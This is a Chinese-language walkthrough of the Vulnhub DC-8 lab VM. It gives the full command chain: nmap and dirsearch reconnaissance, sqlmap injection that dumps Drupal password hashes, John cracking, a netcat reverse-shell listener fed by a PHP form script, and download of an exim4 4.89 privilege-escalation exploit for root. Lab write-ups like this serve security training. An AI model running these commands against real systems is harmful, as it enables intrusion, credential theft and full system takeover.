Vulnhub靶场DC-8

本机192.168.223.128
目标192.168.223.137
主机发现nmap -sP 192.168.223.0/24

端口扫描nmap -sV -p- -A 192.168.223.137

开启了22 80 端口
进入web看一下

没找到什么有用信息,目录扫描一下

dirsearch  -u 192.168.223.137

看了几个界面发现没什么有用的消息，卡在开头了。。。
后来回到主页看，点击details那三个字段url会跳转到nid =1 nid =2 nid=3
可能是sql注入，测试一下

确实有sql注入
用sqlmap跑一下
先爆破库名sqlmap -u http://192.168.223.137/?nid=3 --batch --dbs

d7db
爆表名sqlmap -u http://192.168.223.137/?nid=3 --batch -D d7db --tables

找到其中的users

sqlmap -u http://192.168.223.137/?nid=3 --batch -T users --colums

爆破name和pass

sqlmap -u http://192.168.223.137/?nid=3 --batch -T users -C name,pass --dump

admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
有个john ，应该提示用john破解
把两个密文放到一个txt文档

爆破出来一个turtle
测试发现是john的密码

在contanct us 的form settings里面可以编辑脚本文件

反弹一下shell
攻击机开个监听端口 nc -lvnp 4567
脚本写入

Thanks for taking the time to contact us. We shall be in contact soon.
 

别把标签删了。我把标签删了一直反弹不过去

写进去之后，在contact us 界面随便填写然后提交攻击机就能拿到shell
切换到交互shelll

python -c 'import pty; pty.spawn("/bin/bash")'

翻了一下目录，没看到什么特殊信息，用find查找 suid执行权限的命令

find / -perm -4000 2>/dev/null

据查阅，exim4可能可以用来提权

先查找一下版本号

/usr/sbin/exim4 --version

4.89版本，搜一下有没有漏洞

有这个Privilege Escalation就是提权意思
把46996下载下来
移到攻击机tmp文件，然后靶机wget下载

看一下如何用，有两个方法

先赋一下权chmod 777 46996.sh

第一种失败，第二种成功

最后拿到flag

总结1.sql注入2.john爆破密码3.网页php脚本反弹shell4.exim4提权